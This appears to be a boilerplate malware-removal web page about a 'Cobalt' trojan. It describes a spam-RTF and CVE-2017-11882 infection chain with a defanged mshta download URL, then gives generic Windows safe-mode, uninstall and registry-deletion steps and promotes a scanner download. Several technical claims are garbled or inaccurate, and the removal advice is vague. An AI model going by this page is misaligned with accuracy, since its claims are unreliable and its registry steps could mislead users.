Remove Cobalt Completely From Infected PC (Removal Instructions)

Cobalt : Latest Investigation Report

Cobalt is a system product that is designed by the Strategic Cyber LLC founded by Raphael Mudge. The company is famous to develop software and provide training for the penetration testers. Official site of cobalt is "hxxps://www.cobaltstrike.com". This may used into opponent situations where cyber criminals is trying to get access to a protected environment using spear phishing and infected exploit of zero day vulnerabilities. But somehow the malware developers manages to get the source code of the Cobalt penetration testing tool by Strategic Cyber LLC and modified it to according to their needs to use into some unwanted processes. The very first investigation report has been emerged on 28th November 2017. The threat makers uses and run a massive campaign to send spam emails to huge number of PC users and lure them to open the RTF document file which was send by the Visa credit card issuer to tell about new paywave services.

remove Cobalt

A fake update run with a blank text file that is featured an embedded PowerShell script which convince you to connect to "hyyp://104.254.99./x.txt" By using the Microsoft HTNL host service "mshta.exe". According to malware researchers who alerted about the Cobalt team exploit which is a 17 year old vulnerabilities in Microsoft Office dubbed CVE-2017-11882 that was patched on 31st July 2017. Then the Windows Operating System start to download a JavaScript files which is loaded into the memory of the system and download its components directly inside of the system memory. The infection is loaded into the RAM memory and there is not any physical data has been written to the compromised disk which makes Cobalt powerful to avoid security scanners detections.

Once the Trojan gains access into system the it send out a post request to their Command & Control which acts as a beacon. This threat might shows various actions such as

  • Add new rules to the existing system firewall.
  • Exploit 0-day vulnerabilities.
  • Record log key strokes.
  • Cobalt Trojan can gather hashes and collect information from auto-fill data from your favorite web browsers and Instant Chat managers.
  • It can add additional unwanted processes into already running process to use more system resources to make slow system performance.
  • Cobalt can delete files, folders, makes them corrupt and move from one location to another without your consent.
  • Deploy covert clients of VPN.
  • It can download/install program without taking the user's permission.
  • Disable system programs and also their functionalities.

So you should be use a reliable anti-malware to remove Cobalt from system to use it more securely.

>>Free Download Cobalt Scanner<<

rmv-notice

How to Remove Cobalt from Compromised PC (Manual Steps)

(This guide is intended to help users in following Step by Step instructions in making Windows Safe)

The first step which need to be followed is to Restart Windows PC in Safe Mode

Reboot in Safe Mode (For Windows XP | Vista | Win7)

  1. Restart Computer
  2. Tap on F8 continuously when the PC starts booting and select the option to enter Safe Mode with Networking.

safe mode

For Windows 8/8.1

  1. Press on the Start Button and then Choose Control Panel from the menu option
  2. Users need to opt for System and Security, to select Administrative Tools and then System Configuration.

msconfig-300x201

3.  Next, Click on the Safe Boot option and then choose OK, this will open a pop-up window, next Select Restart Option.

For Windows 10

  1. Start Menu is to be selected to Open it
  2. Press the power button icon which is present in the right corner, this will display power options menu.
  3. Keeping the SHIFT Key pressed on the keyboard, select the restart option. This will reboot Win 10
  4. Now you need to select the Troubleshoot icon, followed by advanced option in the startup Settings. Click on Restart. This will give the option to reboot, now select Enter Safe Mode with Networking.

Step 2. Uninstall Cobalt from Task Manager on Windows

How to End the Running Process related to Cobalt using Task Manager

  1. Firstly, Open Task Manager by Pressing Ctrl+Shift+Esc in Combination
  2. Next, Click on processes to Find Cobalt
  3. Now Click and select End Process to terminate Cobalt.

task manager

Step3: How to Uninstall Cobalt from Control Panel on Windows

for Win XP| Vista and Win 7 Users

  1. Click and Select on Start Menu
  2. Now Control Panel is to be selected from the list
  3. Next Click on Uninstall Program
  4. Users need to Choose suspicious program related to Cobalt and right clicking on it.
  5. Finally, Select Uninstall option.

win7-start-menu-1

control-panel

list-of-programs-win-7

 

For Win 8

  • Click and Select “Charms bar
  • Now Select Settings Option
  • Next Click on Control Panel
  • Select on Uninstall a Program Option and right click on program associated to Cobalt and finally uninstall it.

Win-8-control-panel

 

For Windows 10

  1. The first Step is to Click and Select on Start Menu
  2. Now Click on All Apps
  3. Choose Cobalt and other suspicious program from the complete list
  4. Now right Click on to select Cobalt and finally Uninstall it from Windows 10

1-all-apps

win10-unins3

 

Step: 4 How to Delete Cobalt Created Files from Registry

  • Open Registry by Typing Regedit in the Windows Search Field and then press on Enter.
  • This will open the registry entries. Now users need to press CTRL + F together and type Cobalt to find the entries.
  • Once located, delete all Cobalt named entries. If you are unable to find it, you need to look up for it on the directories manually. Be careful and delete only Cobalt entries, else it can damage your Windows Computer severely.
HKEY_CURRENT_USER—-Software—–Random Directory. 
HKEY_CURRENT_USER—-Software—Microsoft—-Windows—CurrentVersion—Run– Random
HKEY_CURRENT_USER—-Software—Microsoft—Internet Explorer—-Main—- Random

button_ani

Still having any problem in getting rid of Cobalt, or have any doubt regarding this, feel free to ask our experts.

footer-1